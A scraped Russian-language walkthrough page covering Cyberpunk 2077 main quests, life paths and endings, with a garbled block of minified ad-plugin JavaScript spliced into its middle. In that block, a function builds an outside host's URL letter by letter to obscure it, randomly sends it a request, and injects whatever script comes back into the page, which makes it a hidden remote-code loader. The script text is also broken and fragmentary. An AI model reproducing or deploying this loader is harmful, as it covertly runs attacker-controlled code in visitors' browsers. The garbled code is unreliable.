Cyberpunk 2077 «Тайные удовольствия»: прохождение миссии | Техно слухи

«далеко от дома»

Хелльман доставит Ви в лабораторию на космическом корабле, где тот придет в себя. Доктор скажет, что чип успешно извлекли из нашей головы, но домой нам пока нельзя. Нас еще тестируют. Из разговоров главный герой узнает, что тело Ёринобу использовали в качестве сосуда для разума его отца и Сабуро Арасаки продолжает управлять корпорацией, будучи в теле сына.

Медсестра попросит посмотреть на монитор, висящий под потолком, и собрать кубик. После нам зададут несколько вопросов и проведут ряд тестов. Делаем все то же самое изо дня в день. Потом Ви разрешат связаться с близкими (три звонка), но в конце концов он не выдержит всего этого и уничтожит всю обстановку в своей комнате.

После приступа злости главного героя посетит Хэлльман. Доктор принесет неутешительные известия – чип извлечен, но организм Ви умирает. Это завершающий этап, где нам предстоит сделать выбор:

  • Заключить договор на оцифровку разума Ви;
  • Попросить отправить его на Землю, но в этом случае главного героя убьют в лаборатории.

«двойная жизнь»

После того, как мы спасли Эвелин, Альварес отвезет нас к себе домой. В руках главного героя будет коробочка с сигаретами. Снова видим образ Джонни, который попросит нас закурить. На этом моменте вы можете согласиться или отказаться.

Далее идем к Эвелин. Она еще не пришла в себя, поэтому вступить с ней в разговор не получится. Говорим с Джуди и смотрим несколько воспоминаний Эвелин.

Во время первой записи изучаем улики:

  • незнакомая девушка;
  • листовки (лежат под лавкой);
  • монитор с голограммой и вудуистическим алтарем.

Во время второй записи:

  • наблюдаем, как Паркер подслушивает разговор женщины;
  • ждем, пока Джуди активирует переводчик;
  • переключаемся на звуковой слой и слушаем разговор незнакомки по телефону;
  • узнаем, что женщина хочет получить чип и использовать воспоминания Джонни для поиска Альт.
Похожее:  Оплата АО "ЕРЦ "Управдом" г. Москва: коммунальные платежи онлайн

В конце Ви должен решить, рассказывать Джуди о том, что видел в воспоминаниях Эвелин, или нет, после чего он покидает жилье девушки.

«квартира 303»

После похищения Ханако главный герой должен отправиться к Такэмуре. Добираемся до заброшенного многоэтажного здания и стучим четыре раза в дверь. Проходим внутрь и рассказываем Ханако о том, что сделал Ёринобу (про убийство ее отца).

В этот момент на здание нападет отряд корпоратов и случится большой взрыв, из-за которого главный герой, Ханако и Такэмура упадут вниз. Поднявшись, сражаемся с четырьмя противниками. Тут можно воспользоваться прямым боем или тихим устранением.

За эту миссию вы получите достижение «Дьявол».

После падения Ви впадет в обморочное состояние и потеряет возможность управлять своим телом. Вместо него это сделает Джонни Сильверхенд. После случившегося вы очнетесь в другом помещении.

Через некоторое время к нам придет посланница, которая расскажет, что Ханако ждет главного героя в баре «Угли». Девушка хорошо подумала над словами Ви и теперь готова поговорить.

«на перепутье»

Первая цель задания – найти Бестию в клубе. Говорим с ней и просим рассказать о Хелльмане. За информацию женщина попросит 15 тысяч евродолларов. Если у вас есть эта сумма – платите сразу. Если нет, то отправляйтесь делать второстепенные миссии, собирайте вещи, продавайте их и копите нужную сумму.

Заплатив Бестии, вы узнаете, что Хелльмана перевозят под охраной и если поторопиться, его можно похитить в тот момент, когда его вывезут за пределы Найт-Сити. Это трудная миссия, с которой справиться в одиночку вряд ли получится, поэтому Бестия советует найти Панам Палмер – девушку-кочевника, которая поможет Ви. Далее нужно отправиться на встречу с ней.

Основные этапы квеста:

  1. Встречаемся с Палмер и договариваемся об атаке на конвой;
  2. Панам отвозит Ви в лагерь кочевников, где нужно поговорить с двумя мужчинами – Скорпионом и Митчем. Нужно убедить их помочь;
  3. Далее берем оружие в ящике и несем его в автомобиль;
  4. Едем к заброшенной автозаправочной станции и подготавливаемся к атаке: проводим сканирование трех любых устройств и убеждаемся, что они не подключены к сети;
  5. После изучаем трансформатор и электрический щит, помогаем Палмер подключить их к аккумулятору автомобиля;
  6. Включаем электричество, поднимаемся на крышу здания и ждем конвой;
  7. Как только цель прибудет на место, включаем освещение и видим около 10 противников. Нужно бесшумно пройти вниз по левой стороне и убиваем одного врага;
  8. Заходим в строение слева и на втором этаже убиваем еще одного противника. У него есть ключи, которые надо забрать;
  9. Бежим к машине, садимся и уезжаем.

По завершению операции Палмер скажет, что ей нужно убить Нэша – мужчину, предавшего ее. Наша задача – помочь ей. Едем к вражеской базе, убиваем всех со снайперской винтовки (лучшая позиция – на крыше здания слева). Возвращаемся к девушке, и она передаст груз членам банды «Шестая улица».

«неисправность»

Идем на улицу Чпок-Стрит и находим местный магазин. Нам нужно попросить у торговца особые видеоролики, за которыми тот отправит Ви в переулок к дилеру. Темная личность продаст нам брейнданс «Мертвая голова во фритюре» за тысячу евродолларов. Покупаем видео и идем обратно к Альварес. Далее запускаем купленное видео и смотрим.

Что нужно сделать во время брейнданса:

  1. Собираем улики – убитый человек на кушетке, бандит, женщина, рабочая форма электрика (висит в углу помещения), холодный кофе на столе, диски с другими записями, свежая пицца;
  2. Переключаемся на звуковой слой и изучаем звук работающего радио и гул из решетки вентиляции;
  3. Покидаем сеанс брейнданса, анализируем информацию и понимаем, что следующая цель – электростанция.

После разговора девушка отвезет нас к электростанции. Нужно попасть в здание через один из двух доступных входов – калитка (требуется 7 уровень атрибута «Техника») или ворота (их можно выбить, если атрибут «Сила» прокачан до 9 уровня).

Альтернативный вариант: ищем разбитую машину неподалеку, залазим в руины здания, убиваем охранника и используем камеры наблюдения с целью отвлечения бандитов. После их можно устранить поодиночке.

Следующие действия:

  1. Идем в подвал электростанции, попутно собирая улики;
  2. Убиваем охранника в первой комнате;
  3. Используем монитор, чтобы осмотреть другие помещения;
  4. Открываем двери с помощью навыка «Техника»;
  5. Находим быстрый путь на нижний уровень подвального помещения;
  6. Обнаруживаем Эвелин Паркер, берем ее и относим в автомобиль, где нас ждет Джуди.

«пассажир»

Когда над электростанцией пролетит авиация, нужно трижды нажать на кнопку детонатора. Воздушное судно конвоя начнет быстро снижаться и упадет на землю. Едем к месту, но раньше вас туда прибудут два старых знакомых из лагеря кочевников – Митч и Скорпион.

Прибыв к пункту назначения, проводим сканирование места происшествия, выделяя следующие объекты:

  • дроны;
  • Митч, который попал в плен;
  • солдаты;
  • поврежденное воздушное судно.

Далее под прикрытием Палмер бежим к конвою, убиваем всех роботов (способ выбирайте сами), сбиваем летающие дроны с помощью гранатомета, который валяется неподалеку, отключаем вражеские турели.

После забираемся в воздушное судно и видим внутри Митча, который находится в заложниках у пилота. Его подстрелит Палмер. На этом этапе у вас несколько вариантов развития сюжета:

  • Первый – говорим с Митчем и узнаем, что Скорпион мертв, а Хелльмана уже увезли в другое место. Нужно поторопиться, чтобы успеть догнать остатки конвоя;
  • Второй– видим, что никто не выжил, сканируем отпечатки следов на земле и следуем по ним. По пути уничтожаем противников и добираемся до следующей цели квеста.

Что делаем дальше:

  1. Садимся на мотоциклы вместе с Палмер;
  2. Направляемся к ближайшей автозаправочной станции;
  3. Убиваем всех противников, кроме хозяина АЗС (он – заложник);
  4. Идем наверх и находим в комнате Хелльмана;
  5. Оглушаем мужчину и вытаскиваем его наружу.

После спасения Хелльмана к заправке придут все члены клана кочевников. По желанию можно поговорить с их лидером Солом и Палмер. Спустя некоторое время едем в мотель, допрашиваем спасенного Хелльмана. В ходе диалога мужчина расскажет, что в голове Ви находится уникальный чип, и он не может нас спасти. После этого связываемся с Такэмурой и передаем ему Хелльмана в качестве пленника.

«старые друзья»

Этот квест игрок получает в самом начале Акта 2, но его выполнение лучше отложить на потом, так как он обладает высоким уровнем угрозы. Чтобы приступить к прохождению задания, нужно ответить на звонок Такэмуры и встретиться с ним у реки.

Прибыв на встречу с бывшим телохранителем Арасаки, узнаем, что он параллельно договорился о встрече с Одо – личным охранником дочери убитого главы «Arasaki». В ходе диалога Такэмура расскажет Одо о том, что Ёринобу убил отца, и попросит устроить встречу с девушкой.

После встречи едем вместе с Такэмурой к женщине по имени Вакако (фиксер) и берем у нее план проведения мероприятия. Также на этом этапе главный герой может получить от нее вознаграждение за завершенный заказ из пролога.

После встречи с фиксером ждем сутки (можно пропустить время путем сна в квартире Ви) и нам снова позвонит Такэмура. Потом приступаем к следующей миссии.

1. Жизненный путь: Кочевник

Стартовый квест – «Беда не приходит одна»

Главный герой появляется в мастерской перед зеркалом. Его цель – побеседовать с механиком и проверить двигатель транспортного средства. После этого ему нужно сесть в исправленный автомобиль и приготовиться к отправлению.

На этом этапе Ви останавливает полицейский. Надо поговорить с ним, а после направиться к радиовышке. По приезду к пункту назначения забираемся на вершину конструкции и пытаемся связаться с человеком по имени Билли МакКой.

После того, как Ви договорился с ним встретиться, садимся обратно в автомобиль и начинаем двигаться через пустынную местность. В трейлере вы столкнетесь с Джеки, после чего потребуется взять товар, похищенный у корпоратов, и отвезти его в определенное место.

Следующая цель – проникнуть в Найт-Сити. На КПП главного героя забирают с целью выяснения личной информации. Чтобы избавиться от таможенников, надо взять у сообщника деньги и отдать их в качестве взятки. После уплаты «пошлины» Ви проезжает КПП, но через короткое время его попытаются остановить люди на машинах, принадлежащих корпорации «Arasaka».

Джеки начинает управлять автомобилем, в то время как Ви пытается устранить преследователей путем стрельбы из оружия по их машинам. Избежав погони, вы укрываетесь в гаражном помещении, вскрываете коробку с грузом и обнаруживаете в ней живую рептилию.

2. Жизненный путь: Корпорат

Стартовый квест – «Меж двух огней»

Сценарий жизненного пути Корпората начинается в главном здании корпорации «Arasaka» (в туалете). Главный герой беседует со старым приятелем Джеки Уэлсом, после чего отправляется к главе отдела и по пути встречается с еще одним незначительным, но интересным персонажем.

Глава отдела Дженкинс на глазах Ви убивает европейских советников, чтобы выиграть время. После этого события главному герою дают задание – устранить доктора Абернати, женщину, подставившую Дженкинса. По квесту в ваш инвентарь добавится чип с информацией и деньги.

Идя обратно, главный герой может подойти к своему рабочему месту. Там есть важные бумаги, которые доступны для просмотра, а в столе лежит стимулятор и страховой полис. Под этими предметам можно увидеть журнал Retro Gaming с игрой «Ведьмак 3».

Следующая цель – посещение заведения «Лиззи». Там мы встречаемся с Джеки, которому не понравится опасная миссия. Персонаж скажет главному герою, что лучше покинуть должность в корпорации, пока есть шанс. В это время к Ви подойдут два агента Дженкинса, заберут все деньги, чип, скажут, что тот лишился должности, после чего предпримут попытку убийства главного героя.

В этот момент Джеки начнет помогать вам, благодаря чему получится сохранить жизнь. После этого этапа Ви становится наемником и начинает работать вместе со своим спасителем.

3. Жизненный путь: Дитя улиц

Стартовый квест – «За братву и двор»

Начинаются события этого жизненного пути в баре «Эль Койот Коджо». Главный герой пытается вправить себе нос после рукопашного боя и в это время бармен попросит у Ви помощи. По словам парня, тот должен Кирку крупную сумму денег.

Соглашаемся помочь и поднимаемся на второй этаж здания. Там находится Кирк. Нужно поговорить с ним и получить квест, цель которого – похитить ценную машину, а за это Кирк простит долг бармену. Принимаем миссию и следуем к цели, отмеченной на карте маркером.

При выходе из бара Ви сталкивается с местным авторитетом, который предлагает подвезти его. Садимся в авто. Во время езды главный герой становится участником конфликта с другим бандитом, но ничего страшного не произойдет.

По прибытию к месту назначения идем на парковку и беседуем с секьюрити. После разговора направляемся к дальней стене и ищем особое место, где стоит нужный транспорт. Начинаем вскрывать его. В этот момент на Ви нападает вооруженный бандит Джеки. После минутной потасовки обоих забирают копы. Главного героя и Джеки избивают, а после отпускают на волю.

Повторение – мать учения

Вне зависимости от того, какой жизненный путь вы выбрали, после выполнения стартовой цепочки заданий следующая ваша миссия – «Повторение – мать учения».

С момента последних событий вашего жизненного пути прошло 6 месяцев, вы оказываетесь в Японском квартале, говорите со своим другом Джеки и запускаете обучающий сценарий, взяв в руки предмет «Чип обучения Militech».

Основные этапы обучения:

  1. Ознакомление с особенностями боя. Берем автомат и начинаем поражать мишени, прятаться за преградами, восполняем запас здоровья, попутно уничтожая противников;
  2. Обучение основам взлома.Учимся сканировать объекты, подсвечивать различные предметы и взламывать системы. Дополнительно на этом этапе вас обучат захвату врага, бесшумному нападению, оглушению, взлому противников через сеть, а также расскажут, как прятать тело убитого врага;
  3. Азы стелса (скрытности). С помощью оборудование проводим сканирование живых объектов, передвигаемся в положении «Сидя», используем оглушающие приемы и избегаем камер наблюдения;
  4. Обучение более продвинутым боевым приемам. Используем оглушающий прием на врага, помеченного значком черепа, начинаем ближний бой с использованием кулаков, пользуемся такими приемами как блокирование атак, парирование, уклонение. После берем в руки самурайский меч и добиваем тренировочных противников.

1. «Город Мечты»

Основные этапы задания:

  1. Отправляемся в закусочную на встречу с Джеки;
  2. Слушаем рассказ друга о новой миссии, которую предлагает элитный фиксер;
  3. Берем у Джеки ключи от своего автомобиля (с этого момента в вашем гараже появляется личное транспортное средство, вызвать которое можно по нажатию клавиши V);
  4. Садимся в авто и направляемся к риппердоку Виктору;
  5. Приехав к месту назначения, спускаемся в подвальное помещение магазина Мисти, знакомимся с подпольным хирургом и в долг просим его установить имплант в глаз (позволяет сканировать живые объекты вокруг главного героя и оценивать их параметры). В общей сумме вы будете должны Виктору 21 тысячу евродолларов.

Обратите внимание: когда вы спускаетесь в закусочную, возьмите задание, связанное с боксерским рингом. Цель квеста – завершить бои в Найт-Сити. Также по пути главный герой может заполучить пистолет «Угасание ночи» легендарного качества. Он лежит в местной торговой лавке и выделен знаком «!».

3. «Шерше ля фам»

«Шерше ля фам» – первое задание, к которому вы приступаете после разговора с Декстером Дешоном.

Основные этапы миссии:

  1. Отправляемся в бар «Лиззи», чтобы встретиться с заказчицей (делать это нужно только ночью);
  2. Заходим в здание и садимся на стул возле барной стойки;
  3. Ждем, пока к нам присоединится заказчица;
  4. Говорим с ней, после чего Джуди пригласит Ви подключиться к брейндансу;
  5. Смотрим воспоминания, запоминаем местоположение чипа «Arasaki» (уделите этому моменту больше внимания, так как он обучает пользоваться технологией «Брейнданс»);
  6. В воспоминаниях переносимся в магазин, проходим сценарий с ограблением. Тут важно следить за экраном компьютера, так как на нем нам покажут, кто убил грабителя;
  7. Углубляемся в воспоминания, чтобы найти чип:
    • Заходим в комнату, где находится сын главы корпорации «Arasaki» – Ёринобу Арасаки;
    • Внимательно слушаем, о чем он говорит во время телефонного разговора;
    • Перематываем к началу и проводим сканирование следующих объектов: робот, видеокамера, система сигнализации, турель (висит на потолке), планшетный компьютер (его держит Ёринобу);
    • Включаем тепловой слой и осматриваем помещение: кондиционер, чайник, холодильник (в начале записи воспоминаний), потайной сейф, который находится в самом углу помещения за колонной в полу. В сейфе лежит то, что нам нужно – чип.
  1. Возвращаемся в реальность к заказчице и обещаем подумать над ее предложением сотрудничать в обход фиксера (посредника). При желании вы можете сразу отказать женщине.

4. «Низвержение в Мальстрем»

«Низвержение в Мальстрем» – второе задание, к которому вы приступаете после разговора с Декстером Дешоном.

Основные этапы миссии:

  1. Берем телефон и звоним агенту безопасности по имени Мередит Стаут, после чего отправляемся на встречу с женщиной (смотрим маркер на карте);
  2. В процессе разговора с Мередит договариваемся сдать бандитов и обмен на робота. Женщина предложит взять денежный чип, чтобы заплатить за товар. На этом этапе вы можете сделать выбор – принять чип или нет;
  3. После встречи с Мередит отправляемся к Джеки и вместе с ним идем к месту дислокации членов группировки «Мальстрем». На входе в завод будет пусто, поэтому без опаски двигаемся по тихим коридорам, пока не доберемся до центрального цеха.

Когда вы доберетесь до цеха, у вас будет четыре варианта развития сюжета:

  • Первый – не успокаиваем нашего друга и вступаем в схватку с бандитами, так и не дождавшись, пока придет их лидер и принесет робота. Ви и Джеки попадают в плен и оказываются запертыми в комнате. Нужно вскрыть дверь и в другой комнате забрать чемодан с роботом;
  • Второй – беседуем с членами банды «Мальстрем», осматриваем робота. После придет лидер группировки и скажет, чтобы Ви заплатил за товар еще раз. В том случае, если у вас нет с собой 10 тысяч евродолларов, начинаем бой, убиваем главаря и забираем робота. Бонусом к нему станет культовый пистолет «Хаос»;
  • Третий – платим всю сумму за робота (отдаем денежный чип Мередит и свои 10 тысяч), берем товар и покидаем цех. В этом случае у вас не будет шанса осмотреть все заводское здание;
  • Четвертый– платим за робота, предупреждаем бандитов об облаве, которую устроила Мередит, помогаем членам «Мальстрема» сразиться с ее солдатами.

Если вы выбрали вариант с боем, старайтесь убежать с завода, пока вас не убили. Направляемся к лестнице, залазим на ящики и бежим в соседний зал. Там вас ждет группа бандитов, среди которых есть нетраннер. Он будет использовать на Ви быстрее взломы. Если не убить его в первую очередь, главный герой погибнет.

7. «Вечный сон»

Как только вы завершите сценарий, играя за Джонни, главный герой очнется на городской свалке в реальном времени.

Что делаем дальше:

  1. Выползаем из мусорника;
  2. Наблюдаем, как Такэмура убивает Декстера Дешона и забирает Ви;
  3. Слушаем, как Такэмура говорит Ёринобу, что нашел того, кто убил его отца;
  4. Во время транспортировки Ви к Ёринобу на автомобиль нападают корпораты и мы попадаем в ДТП;
  5. После аварии отправляемся вместе с Такэмурой к Виктору в магазин Мисти и лечимся у него;
  6. От риппердока получаем информацию о том, что чип в нашей голове постепенно подменяет наше создание, и это будет продолжаться до тех пор, пока оно не заменится на 100%;
  7. Получаем у Мисти препарат, который замедлит процесс потери собственного сознания, и ложимся спать;
  8. После пробуждения видим перед собой Джонни Сильверхенда (да, он в чипе, который находится в голове Ви). Чтобы убрать этот образ, нужно выпить препарат, который дала Мисти.

1. «По ком звонит колокол»

Прежде чем отправиться на встречу с дочерью покойного Сабуро Арасаки, игроку поступит уведомление о том, что он приступает к финальной стадии сюжетной линии Cyberpunk 2077. Если вы продолжите, то не сможете выполнять второстепенные миссии до тех пор, пока не завершится сценарий концовки сюжета. На этом этапе мы советуем на всякий случай сделать сохранение.

Основные этапы квеста «По ком звонит колокол»:

  1. Идем в бар к Ханако, говорим с ней и берем заказ на устранение Ёринобу с поста владельца корпорации (без убийства). За это девушка поможет Ви решить проблему с чипом в его голове;
  2. Говорим Ханако, что подумаем над ее предложением и уходим;
  3. Во время поездки в лифте теряем сознание и очнемся уже у риппердока Виктора;
  4. Доктор скажет Ви, что его время на исходе. Нам нужно выпить препарат и забрать пистолет;
  5. Мисти проведет нас на крышу здания и попросит подумать над происходящим в одиночестве;
  6. Делаем сохранение, а после садимся и по желанию звоним нашей второй половинке (персонажу, с которым вы завершили цепочку квестов на романтические отношения).

После этого нам нужно выбрать, какой будет концовка сюжета игры. Всего есть 4 варианта:

  • «Можно покончить со всем прямо сейчас». Выбрасываем препарат и убиваем себя. Это действие запускает титры, где можно прочитать посмертную речь от всех близких для Ви людей, включая маму Джеки, Виктора, Мисти и проч.;
  • «Я попрошу помощи у Панам». Концовка доступна после выполнения всех второстепенных квестов от Панам Палмер. В этом случае нам поможет не только девушка, но и члены клана кочевников;
  • «Надеюсь, Арасаки не подведет». После нажатия этой диалоговой строчки образ Джонни исчезнет, и мы сможем определиться с тем, кто поможет нам в штурме башни корпорации «Arasaki». К сожалению, кроме Ханако вариантов не будет, поэтому звоним девушке и принимаем ее предложение. Мисти будет недовольна таким развитием событий, но выбор сделан. На миссию нас увезет Хелльман;
  • «Доверюсь вам с Бестией». Эта концовка доступна только после выполнения всех заданий от Сильверхенда. Выбрав ее, вы передаете тело Ви под контроль Джонни и вместе с Бестией отправляетесь на финальное задание.

Cyberpunk 2077 «тайные удовольствия»: прохождение миссии | техно слухи

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement(“div”)),n=(d.exec(e)||[“”,””])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1] e.replace(o,”<$1>”) n[2],r=n[0];r–;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,n=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,r=’

‘,i=e.once;l(t).each(function(){var e=l(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==r.indexOf(“go” “oglesyndication”)?t.append(r):flatPM_setHTML(t[0],r),e.find(“.flat__4_video_flex”).one(“click”,function(){l(this).addClass(“show”)})}),l(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=l(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),n=parseInt(o),r=setInterval(function(){a.text(–n),n<=0&&(clearInterval(r),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){l(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&l(“.flat__4_video_flex”).remove()})};

Аудиенция

АудиенцияАудиенция

После выполнения задания «На мягких лапах» Такэмура снова пропадает. Через несколько дней он свяжется с нами и даст задание – убить трёх снайперов на крышах, которые наблюдают за парадом.

Чтобы добраться до первого снайпера, нужно пройти несколько мостиков и зайти в здание. Внутри будет мина растяжка, желательно её обезвредить если позволяют навыки. До снайпера можно подобраться бесшумно, если допрыгнуть до возвышенности с ним.

Ликвидация снайперовЛиквидация снайперов

Для устранения второй цели поднимаемся на 21 этаж здания. Проходим по балконам здания. Территорию патрулируют дроны. Не попадаемся им на глаза, чтобы не поднять тревогу. Внизу здания будет солдат-охранник. Разбираемся с ним и обезвреживаем еще одну мину. Снайпер сидит в следующей комнате.

Дорога к последнему снайперу самая сложная. Надо пробежать по мостику с трубами в тот момент, когда будут пролетать корабли парада. Нужно соблюдать идеальный тайминг, чтобы не попадаться на глаза противникам и не сгореть от огня двигателей.

Пройдя мост поднимаемся выше и обходим двух противников. Дальше поднимаемся на лифте и залазим к нему в комнату через третье окно. Снайпер устранён.

Бой с ОдаБой с Ода

Следующей целью будет нетраннер. Добираемся до него и выводим из строя. В этот момент нападает Ода. Бой с ним состоит из трех фаз.

Фаза 1. Босс дерётся с помощью катан. Наносим урон огнестрельным оружием и постоянно уклоняемся от атак. Используем сильные аптечки, чтобы восстанавливать здоровье.

Фаза 2. Ода начнет использовать огнестрел. Используем чаще укрытия и отстреливаемся.

Фаза 3. Противник включит невидимость и будет восстанавливать здоровье. Гоняемся за ним и расстреливаем.

Оду можно убить или оставить в живых, за что поблагодарит Такэмура. Видим на камерах как Такэмура уносит тело Ханаки и убегаем. За нами прилетит два дрона, разбираемся с ними.

Квартира 303

Квартира 303Квартира 303

Такэмура сбрасывает координаты и отправляемся в его убежище. Пароль для входа – четыре стука в дверь. Ханако не верит всему, что вы говорите. Пытаемся её убедить.

Разговор прерывает взрыв, который вызвали солдаты Арасаки. Здание начинает частично рушится. Выбираемся из завалов и убиваем всех врагов на пути или пробираемся незаметно.

Отряд АрасакиОтряд Арасаки

Дополнительный квест по спасению Такэмуры. В комнате где вы оказываетесь ищем неоновый крест. Проходим через пролом и на верхнем этаже убиваем наёмников.

Когда Ви будет уже на улице, то потеряет сознание. Очнемся в неизвестном месте и к нам подойдет девушка, которая передаст сообщение от Ханако. Нам назначили тайную встречу.

Квест «кукольный домик»

  • Тип задания: основное задание
